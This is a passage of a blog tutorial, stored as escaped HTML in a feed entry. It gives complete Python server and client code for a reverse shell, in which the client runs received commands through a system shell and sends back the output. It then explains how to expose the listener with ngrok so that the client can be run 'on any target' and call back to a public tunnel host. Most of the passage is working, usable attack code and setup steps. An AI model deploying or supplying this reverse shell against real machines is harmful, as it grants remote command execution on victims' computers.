class=\"o\">=<\/span> <span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">socket<\/span><span class=\"p\">()<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">setsockopt<\/span><span class=\"p\">(<\/span><span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">SOL_SOCKET<\/span><span class=\"p\">,<\/span> <span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">SO_REUSEADDR<\/span><span class=\"p\">,<\/span> <span class=\"mi\">1<\/span><span class=\"p\">)<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">bind<\/span><span class=\"p\">((<\/span><span class=\"n\">HOST<\/span><span class=\"p\">,<\/span> <span class=\"n\">PORT<\/span><span class=\"p\">))<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">listen<\/span><span class=\"p\">(<\/span><span class=\"mi\">1<\/span><span class=\"p\">)<\/span>\n<span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"sa\">f<\/span><span class=\"s1\">&#39;[*] listening as <\/span><span class=\"si\">{<\/span><span class=\"n\">HOST<\/span><span class=\"si\">}<\/span><span class=\"s1\">:<\/span><span class=\"si\">{<\/span><span class=\"n\">PORT<\/span><span class=\"si\">}<\/span><span class=\"s1\">&#39;<\/span><span class=\"p\">)<\/span>\n\n<span class=\"c1\"># waiting for the target and sent a welcome message if it connected<\/span>\n<span class=\"n\">client_s<\/span><span class=\"p\">,<\/span> <span class=\"n\">client_addr<\/span> <span class=\"o\">=<\/span> <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">accept<\/span><span class=\"p\">()<\/span>\n<span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"sa\">f<\/span><span class=\"s1\">&#39;[*] client connected <\/span><span class=\"si\">{<\/span><span class=\"n\">client_addr<\/span><span class=\"si\">}<\/span><span class=\"s1\">&#39;<\/span><span class=\"p\">)<\/span>\n<span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">send<\/span><span class=\"p\">(<\/span><span class=\"s1\">&#39;welcome&#39;<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">())<\/span>\n\n<span class=\"c1\"># this loop will run, until you enter &#39;quit&#39;<\/span>\n<span class=\"k\">while<\/span> <span class=\"kc\">True<\/span><span class=\"p\">:<\/span>\n\n    <span class=\"c1\"># 1. enter the command and send it to the target<\/span>\n    <span class=\"n\">cmd<\/span> <span class=\"o\">=<\/span> <span class=\"nb\">input<\/span><span class=\"p\">(<\/span><span class=\"s1\">&#39;&gt;&gt;&gt; &#39;<\/span><span class=\"p\">)<\/span>\n    <span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">send<\/span><span class=\"p\">(<\/span><span class=\"n\">cmd<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">())<\/span>\n\n    <span class=\"c1\"># check if you want to quit<\/span>\n    <span class=\"k\">if<\/span> <span class=\"n\">cmd<\/span><span class=\"o\">.<\/span><span class=\"n\">lower<\/span><span class=\"p\">()<\/span> <span class=\"o\">==<\/span> <span class=\"s1\">&#39;quit&#39;<\/span><span class=\"p\">:<\/span>\n        <span class=\"k\">break<\/span>\n\n    <span class=\"c1\"># get the result of the command, executed on the target pc<\/span>\n    <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">recv<\/span><span class=\"p\">(<\/span><span class=\"mi\">1024<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">decode<\/span><span class=\"p\">()<\/span>\n    <span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"n\">result<\/span><span class=\"p\">)<\/span>\n\n<span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">close<\/span><span class=\"p\">()<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">close<\/span><span class=\"p\">()<\/span>\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"client\">\n<h3>Client<\/h3>\n<div class=\"highlight\"><pre><span><\/span><span class=\"kn\">import<\/span> <span class=\"nn\">socket<\/span>\n<span class=\"kn\">import<\/span> <span class=\"nn\">subprocess<\/span>\n\n<span class=\"n\">HOST<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;0.0.0.0&#39;<\/span>\n<span class=\"n\">PORT<\/span> <span class=\"o\">=<\/span> <span class=\"mi\">5555<\/span>\n\n<span class=\"c1\"># set up the socket and connect to the server<\/span>\n<span class=\"n\">s<\/span> <span class=\"o\">=<\/span> <span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">socket<\/span><span class=\"p\">()<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">connect<\/span><span class=\"p\">((<\/span><span class=\"n\">HOST<\/span><span class=\"p\">,<\/span> <span class=\"n\">PORT<\/span><span class=\"p\">))<\/span>\n\n<span class=\"c1\"># get the welcome message<\/span>\n<span class=\"n\">msg<\/span> <span class=\"o\">=<\/span> <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">recv<\/span><span class=\"p\">(<\/span><span class=\"mi\">1024<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">decode<\/span><span class=\"p\">()<\/span>\n<span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"s1\">&#39;[*] server:&#39;<\/span><span class=\"p\">,<\/span> <span class=\"n\">msg<\/span><span class=\"p\">)<\/span>\n\n<span class=\"c1\"># this loop will run until it receive &#39;quit&#39;<\/span>\n<span class=\"k\">while<\/span> <span class=\"kc\">True<\/span><span class=\"p\">:<\/span>\n\n    <span class=\"c1\"># receive the command and print it<\/span>\n    <span class=\"n\">cmd<\/span> <span class=\"o\">=<\/span> <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">recv<\/span><span class=\"p\">(<\/span><span class=\"mi\">1024<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">decode<\/span><span class=\"p\">()<\/span>\n    <span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"sa\">f<\/span><span class=\"s1\">&#39;[*] receive <\/span><span class=\"si\">{<\/span><span class=\"n\">cmd<\/span><span class=\"si\">}<\/span><span class=\"s1\">&#39;<\/span><span class=\"p\">)<\/span>\n\n    <span class=\"c1\"># check if you want to quit<\/span>\n    <span class=\"k\">if<\/span> <span class=\"n\">cmd<\/span><span class=\"o\">.<\/span><span class=\"n\">lower<\/span><span class=\"p\">()<\/span> <span class=\"o\">==<\/span> <span class=\"s1\">&#39;quit&#39;<\/span><span class=\"p\">:<\/span>\n        <span class=\"k\">break<\/span>\n\n    <span class=\"c1\"># now run the command and get the result.<\/span>\n    <span class=\"k\">try<\/span><span class=\"p\">:<\/span>\n        <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"n\">subprocess<\/span><span class=\"o\">.<\/span><span class=\"n\">check_output<\/span><span class=\"p\">(<\/span><span class=\"n\">cmd<\/span><span class=\"p\">,<\/span> <span class=\"n\">stderr<\/span><span class=\"o\">=<\/span><span class=\"n\">subprocess<\/span><span class=\"o\">.<\/span><span class=\"n\">STDOUT<\/span><span class=\"p\">,<\/span> <span class=\"n\">shell<\/span><span class=\"o\">=<\/span><span class=\"kc\">True<\/span><span class=\"p\">)<\/span>\n    <span class=\"k\">except<\/span> <span class=\"ne\">Exception<\/span> <span class=\"k\">as<\/span> <span class=\"n\">e<\/span><span class=\"p\">:<\/span>\n        <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"nb\">str<\/span><span class=\"p\">(<\/span><span class=\"n\">e<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">()<\/span>\n\n    <span class=\"c1\"># if the command has no output, send &#39;ok&#39; so the server knows everything is okay<\/span>\n    <span class=\"k\">if<\/span> <span class=\"nb\">len<\/span><span class=\"p\">(<\/span><span class=\"n\">result<\/span><span class=\"p\">)<\/span> <span class=\"o\">==<\/span> <span class=\"mi\">0<\/span><span class=\"p\">:<\/span>\n        <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;OK&#39;<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">()<\/span>\n\n    <span class=\"c1\"># send teh result to the server<\/span>\n    <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">send<\/span><span class=\"p\">(<\/span><span class=\"n\">result<\/span><span class=\"p\">)<\/span>\n\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">close<\/span><span class=\"p\">()<\/span>\n<\/pre><\/div>\n<\/div>\n<\/div>\n<div class=\"section\" id=\"how-to-run\">\n<h2>How to run<\/h2>\n<p>We only uses the Python Standard Library, so we don't have to install anything.\nSimple execute<\/p>\n<div class=\"highlight\"><pre><span><\/span>python3 server.py\n<\/pre><\/div>\n<p>and<\/p>\n<div class=\"highlight\"><pre><span><\/span>python3 client.py\n<\/pre><\/div>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/reverse-shell-001.gif\" style=\"width: 100%;\" \/>\n<p>The server run with <em>HOST=0.0.0.0<\/em> so that it listen on all incoming connection.\nOn some examples you read something like <em>HOST=localhost<\/em> or <em>HOST=127.0.0.1<\/em>.\nBut then it's only listen on connection from the <em>localhost<\/em>. You shouldn't\nchange the <em>HOST<\/em> of the server script. But if you run the client on another PC,\nyou have to enter the IP address of the server for the <em>HOST<\/em>. You get a problem\nif the PC is not in your local network. Of course you can forward the port in\nyour router and then specify your public IP as <em>HOST<\/em>. But I want to show you\nanother way.<\/p>\n<\/div>\n<div class=\"section\" id=\"ngrok\">\n<h2>ngrok<\/h2>\n<p>ngrok is a reverse proxy that creates a secure tunnel from a public endpoint to\na locally running web service. Simply put, with ngrok you can make any local\nservice public. And we will make our server public. Go to\n<a class=\"reference external\" href=\"https:\/\/ngrok.com\">ngrok<\/a> sign up and follow the setup tutorial for your\nsystem. For me it's<\/p>\n<blockquote>\n<ol class=\"arabic\">\n<li><p class=\"first\">download<\/p>\n<div class=\"highlight\"><pre><span><\/span>wget https:\/\/bin.equinox.io\/c\/4VmDzA7iaHb\/ngrok-stable-linux-amd64.zip\n<\/pre><\/div>\n<\/li>\n<li><p class=\"first\">unzip<\/p>\n<div class=\"highlight\"><pre><span><\/span>unzip ngrok-stable-linux-amd64.zip\n<\/pre><\/div>\n<\/li>\n<li><p class=\"first\">connect your account<\/p>\n<div class=\"highlight\"><pre><span><\/span>.\/ngrok authtoken 1WeW...\n<\/pre><\/div>\n<\/li>\n<li><p class=\"first\">exposed the server<\/p>\n<div class=\"highlight\"><pre><span><\/span>.\/ngrok tcp <span class=\"m\">5555<\/span>\n<\/pre><\/div>\n<\/li>\n<\/ol>\n<\/blockquote>\n<p>Now you are ready to run the client on any target, but you have to change the\n<em>HOST<\/em> and <em>PORT<\/em> to the values from ngrok. For my example that will be<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">...<\/span>\n<span class=\"n\">HOST<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;4.tcp.ngrok.io&#39;<\/span>\n<span class=\"n\">PORT<\/span> <span class=\"o\">=<\/span> <span class=\"mi\">12050<\/span>\n<span class=\"o\">....<\/span>\n<\/pre><\/div>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/reverse-shell-002.png\" style=\"width: 100%;\" \/>\n<\/div>\n<div class=\"section\" id=\"conclusion\">\n<h2>Conclusion<\/h2>\n<p>As you can see, it's not that complicated to create your own reverse shell and\nmake it public. I know, there's a lot of space to improve this script. But for a\nreally Simple example they are quite good enough.<\/p>\n<\/div>\n","category":[{"@attributes":{"term":"security"}},{"@attributes":{"term":"security"}},{"@attributes":{"term":"linux"}},{"@attributes":{"term":"hacking"}},{"@attributes":{"term":"shell"}},{"@attributes":{"term":"sockets"}}]}]}